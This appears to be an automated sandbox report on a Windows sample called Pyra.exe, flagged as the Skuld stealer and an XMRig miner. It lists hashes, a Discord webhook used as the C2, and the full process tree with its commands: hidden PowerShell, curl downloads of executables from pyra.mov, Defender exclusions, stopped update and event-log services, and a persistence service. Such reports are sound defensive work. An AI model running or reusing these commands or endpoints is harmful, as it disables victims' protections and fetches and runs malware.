Analysis

  • max time kernel
    149s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/04/2025, 12:03

General

  • Target

    pyra/Pyra.exe

  • Size

    257KB

  • MD5

    7a5e41ba12a894b44fb1a1624eb3e899

  • SHA1

    c7e7321eaa462eab2c900003577de57ee4a1bc0a

  • SHA256

    f5c969927a6ccabd7e29d659b1e0f28730fbe0e3c87063b194f8cc46b0c340df

  • SHA512

    4b321938b3cc66fb344eb63c3482abc0fa896b52341c5614c93a5ae3efc14fb073fb0084a5fcd02e095976463c39a6a3c3a6027dc7f8297deee2b4ce31aaeb14

  • SSDEEP

    6144:vTOEaJKAIbUNeolFb08afQ1Y28qUSyjPm:b3bQO4m

Malware Config

Extracted

Family

skuld

C2

https://discord.com/api/webhooks/1357468186764775586/BRP230l-SHvQfTpsLO5GgfFtW8ZwDogt43OWww-lXchxPOAw7f7pT6n98q0MMIyhGHyc

Signatures

  • Skuld family
  • Skuld stealer

    An info stealer written in Go lang.

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 12 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Modifies file permissions 1 TTPs 26 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 17 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\pyra\Pyra.exe
    "C:\Users\Admin\AppData\Local\Temp\pyra\Pyra.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3192
    • C:\Windows\system32\cmd.exe
      "cmd" /C C:\Users\Admin\AppData\Local\Temp\pyra\data\data.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5584
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\pyra\data\data.bat h' -WindowStyle Hidden"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5696
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\pyra\data\data.bat h
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4748
          • C:\Windows\system32\net.exe
            NET SESSION
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4940
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 SESSION
              6⤵
                PID:4404
            • C:\Windows\system32\where.exe
              where curl
              5⤵
                PID:6112
              • C:\Windows\system32\curl.exe
                curl -o "C:\Users\Admin\AppData\Local\file1.exe" "https://pyra.mov/test/test1" --silent --show-error
                5⤵
                • Downloads MZ/PE file
                PID:5236
              • C:\Windows\system32\curl.exe
                curl -o "C:\Users\Admin\AppData\Local\file2.exe" "https://pyra.mov/test/test2" --silent --show-error
                5⤵
                • Downloads MZ/PE file
                PID:4056
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:4668
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:4956
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:1804
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:5816
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:1808
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:5524
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:5832
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:5840
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:6080
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:4112
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:5672
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:2076
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:5368
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:4772
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:2812
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:4008
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:4444
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:2896
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:1076
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:6076
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:5708
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:884
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:3756
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:3704
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:4296
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                5⤵
                • Modifies file permissions
                PID:5920
              • C:\Windows\system32\timeout.exe
                timeout /t 15 /nobreak
                5⤵
                • Delays execution with timeout.exe
                PID:5416
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\file1.exe' -Verb RunAs"
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2480
                • C:\Users\Admin\AppData\Local\file1.exe
                  "C:\Users\Admin\AppData\Local\file1.exe"
                  6⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1932
                  • C:\Windows\system32\attrib.exe
                    attrib +h +s C:\Users\Admin\AppData\Local\file1.exe
                    7⤵
                    • Views/modifies file attributes
                    PID:3912
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\file2.exe' -Verb RunAs"
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1980
                • C:\Users\Admin\AppData\Local\file2.exe
                  "C:\Users\Admin\AppData\Local\file2.exe"
                  6⤵
                  • Executes dropped EXE
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:384
                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2372
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                    7⤵
                      PID:1496
                      • C:\Windows\system32\wusa.exe
                        wusa /uninstall /kb:890830 /quiet /norestart
                        8⤵
                          PID:4204
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop UsoSvc
                        7⤵
                        • Launches sc.exe
                        PID:5460
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                        7⤵
                        • Launches sc.exe
                        PID:1352
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop wuauserv
                        7⤵
                        • Launches sc.exe
                        PID:4396
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop bits
                        7⤵
                        • Launches sc.exe
                        PID:1000
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop dosvc
                        7⤵
                        • Launches sc.exe
                        PID:2056
                      • C:\Windows\system32\powercfg.exe
                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                        7⤵
                        • Power Settings
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1348
                      • C:\Windows\system32\powercfg.exe
                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                        7⤵
                        • Power Settings
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4868
                      • C:\Windows\system32\powercfg.exe
                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                        7⤵
                        • Power Settings
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4648
                      • C:\Windows\system32\powercfg.exe
                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                        7⤵
                        • Power Settings
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4672
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe delete "BUZZLBYC"
                        7⤵
                        • Launches sc.exe
                        PID:4692
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe create "BUZZLBYC" binpath= "C:\ProgramData\oycwqqzuyrth\iixpziuhlnum.exe" start= "auto"
                        7⤵
                        • Launches sc.exe
                        PID:4732
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop eventlog
                        7⤵
                        • Launches sc.exe
                        PID:4908
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe start "BUZZLBYC"
                        7⤵
                        • Launches sc.exe
                        PID:1876
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
            1⤵
            • Checks computer location settings
            • Suspicious use of SetWindowsHookEx
            PID:2624
          • C:\ProgramData\oycwqqzuyrth\iixpziuhlnum.exe
            C:\ProgramData\oycwqqzuyrth\iixpziuhlnum.exe
            1⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4972
            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              2⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:920
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              2⤵
                PID:3416
                • C:\Windows\system32\wusa.exe
                  wusa /uninstall /kb:890830 /quiet /norestart
                  3⤵
                    PID:2368
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop UsoSvc
                  2⤵
                  • Launches sc.exe
                  PID:1616
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop WaaSMedicSvc
                  2⤵
                  • Launches sc.exe
                  PID:5776
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop wuauserv
                  2⤵
                  • Launches sc.exe
                  PID:1884
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop bits
                  2⤵
                  • Launches sc.exe
                  PID:5524
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop dosvc
                  2⤵
                  • Launches sc.exe
                  PID:6072
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                  2⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4112
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                  2⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3656
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                  2⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5368
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                  2⤵
                  • Power Settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5304
                • C:\Windows\system32\conhost.exe
                  C:\Windows\system32\conhost.exe
                  2⤵
                    PID:3632
                  • C:\Windows\explorer.exe
                    explorer.exe
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1444

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  2KB

                  MD5

                  6cf293cb4d80be23433eecf74ddb5503

                  SHA1

                  24fe4752df102c2ef492954d6b046cb5512ad408

                  SHA256

                  b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                  SHA512

                  0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  64B

                  MD5

                  4a8750d37bdeb0dbbedfd93483f62e1e

                  SHA1

                  02513d378b383b09baff52d447a636cc3908c5ed

                  SHA256

                  f0a7444bbb339ba67fdd6a66dbd62ab98dddf69beb510751e5105cef96772a44

                  SHA512

                  1872b51d05dd4b2dbfc72035173351ee786bc49190e73ab5f7cfcdc50c5896a619d84c74d4fd43f739b3715c7b3be9aa82cce8196c34d33b02e59b25b296118f

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  64B

                  MD5

                  446dd1cf97eaba21cf14d03aebc79f27

                  SHA1

                  36e4cc7367e0c7b40f4a8ace272941ea46373799

                  SHA256

                  a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

                  SHA512

                  a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1wqraxoq.ten.ps1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Users\Admin\AppData\Local\file1.exe

                  Filesize

                  9.3MB

                  MD5

                  a8133dab079ce24c46a35749109d8f34

                  SHA1

                  455ac75b069b855bd3785a0f56d69276b8e83b01

                  SHA256

                  c8c36f079915be17e2c725b4247ceca4269e42fa6712f59d90147b103d60251e

                  SHA512

                  a57ecbda300a2a92c034177bf70cf441606ae9a68e1d0ec1be032921cea44d5fdfde23c5dfcf10dcc9b97a518b0a31d752fb24b344a5f80c30aa3e20e429ec06

                • C:\Users\Admin\AppData\Local\file2.exe

                  Filesize

                  2.5MB

                  MD5

                  514e00d37d15901490a4974d59e63c96

                  SHA1

                  80575034e11501ad1fff1ad865234d109cbc6a16

                  SHA256

                  51371a9eb105df4a666f224347e377bc294358ad022d3c4a739fe3f65e09637d

                  SHA512

                  e55508411a803333cb67bb12a8b6f76b9f627a94de87263ba44e59e00e70722b938b3de5fc14bcd5d37871bbf760751ba973454eb077efdaae0a26b96138c255

                • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

                  Filesize

                  4.6MB

                  MD5

                  2b6652feda7a55cb7967f85bcd1b14c7

                  SHA1

                  d81e9e4dfc8389a4b79574410d87650c3b0f9113

                  SHA256

                  30b83d446e3ce4d03a9c03bd2c928dc8bde76067ceab120088ea3ac49e1d8cf8

                  SHA512

                  622b592aaa2591645029c079569106581e35fb5998d51a9e1fbd6faa68116f854a9d6ce7bdceff712e18000ea4c6af5b1977282a730d6d04fbe00005e2330e4f

                • memory/920-84-0x0000025C7E210000-0x0000025C7E21A000-memory.dmp

                  Filesize

                  40KB

                • memory/920-85-0x0000025C7E270000-0x0000025C7E28A000-memory.dmp

                  Filesize

                  104KB

                • memory/920-86-0x0000025C7E220000-0x0000025C7E228000-memory.dmp

                  Filesize

                  32KB

                • memory/920-87-0x0000025C7E250000-0x0000025C7E256000-memory.dmp

                  Filesize

                  24KB

                • memory/920-88-0x0000025C7E260000-0x0000025C7E26A000-memory.dmp

                  Filesize

                  40KB

                • memory/920-83-0x0000025C7E230000-0x0000025C7E24C000-memory.dmp

                  Filesize

                  112KB

                • memory/920-80-0x0000025C7E120000-0x0000025C7E13C000-memory.dmp

                  Filesize

                  112KB

                • memory/920-81-0x0000025C7E140000-0x0000025C7E1F5000-memory.dmp

                  Filesize

                  724KB

                • memory/920-82-0x0000025C7E200000-0x0000025C7E20A000-memory.dmp

                  Filesize

                  40KB

                • memory/1444-105-0x0000000140000000-0x0000000140835000-memory.dmp

                  Filesize

                  8.2MB

                • memory/1444-109-0x0000000140000000-0x0000000140835000-memory.dmp

                  Filesize

                  8.2MB

                • memory/1444-115-0x0000000140000000-0x0000000140835000-memory.dmp

                  Filesize

                  8.2MB

                • memory/1444-116-0x0000000140000000-0x0000000140835000-memory.dmp

                  Filesize

                  8.2MB

                • memory/1444-114-0x0000000140000000-0x0000000140835000-memory.dmp

                  Filesize

                  8.2MB

                • memory/1444-113-0x0000000140000000-0x0000000140835000-memory.dmp

                  Filesize

                  8.2MB

                • memory/1444-112-0x0000000140000000-0x0000000140835000-memory.dmp

                  Filesize

                  8.2MB

                • memory/1444-111-0x0000000140000000-0x0000000140835000-memory.dmp

                  Filesize

                  8.2MB

                • memory/1444-108-0x0000000140000000-0x0000000140835000-memory.dmp

                  Filesize

                  8.2MB

                • memory/1444-110-0x0000000140000000-0x0000000140835000-memory.dmp

                  Filesize

                  8.2MB

                • memory/1444-107-0x0000000140000000-0x0000000140835000-memory.dmp

                  Filesize

                  8.2MB

                • memory/1444-101-0x0000000140000000-0x0000000140835000-memory.dmp

                  Filesize

                  8.2MB

                • memory/1444-99-0x0000000140000000-0x0000000140835000-memory.dmp

                  Filesize

                  8.2MB

                • memory/1444-100-0x0000000140000000-0x0000000140835000-memory.dmp

                  Filesize

                  8.2MB

                • memory/1444-104-0x0000000140000000-0x0000000140835000-memory.dmp

                  Filesize

                  8.2MB

                • memory/1444-102-0x0000000140000000-0x0000000140835000-memory.dmp

                  Filesize

                  8.2MB

                • memory/1444-103-0x0000000140000000-0x0000000140835000-memory.dmp

                  Filesize

                  8.2MB

                • memory/1444-106-0x0000000000A50000-0x0000000000A70000-memory.dmp

                  Filesize

                  128KB

                • memory/3632-98-0x0000000140000000-0x000000014000E000-memory.dmp

                  Filesize

                  56KB

                • memory/3632-91-0x0000000140000000-0x000000014000E000-memory.dmp

                  Filesize

                  56KB

                • memory/3632-92-0x0000000140000000-0x000000014000E000-memory.dmp

                  Filesize

                  56KB

                • memory/3632-93-0x0000000140000000-0x000000014000E000-memory.dmp

                  Filesize

                  56KB

                • memory/3632-94-0x0000000140000000-0x000000014000E000-memory.dmp

                  Filesize

                  56KB

                • memory/3632-95-0x0000000140000000-0x000000014000E000-memory.dmp

                  Filesize

                  56KB

                • memory/5696-0-0x00007FFC49913000-0x00007FFC49915000-memory.dmp

                  Filesize

                  8KB

                • memory/5696-16-0x00007FFC49910000-0x00007FFC4A3D1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/5696-10-0x0000019AADD50000-0x0000019AADD72000-memory.dmp

                  Filesize

                  136KB

                • memory/5696-11-0x00007FFC49910000-0x00007FFC4A3D1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/5696-12-0x00007FFC49910000-0x00007FFC4A3D1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/5696-15-0x0000019AADF30000-0x0000019AAE14C000-memory.dmp

                  Filesize

                  2.1MB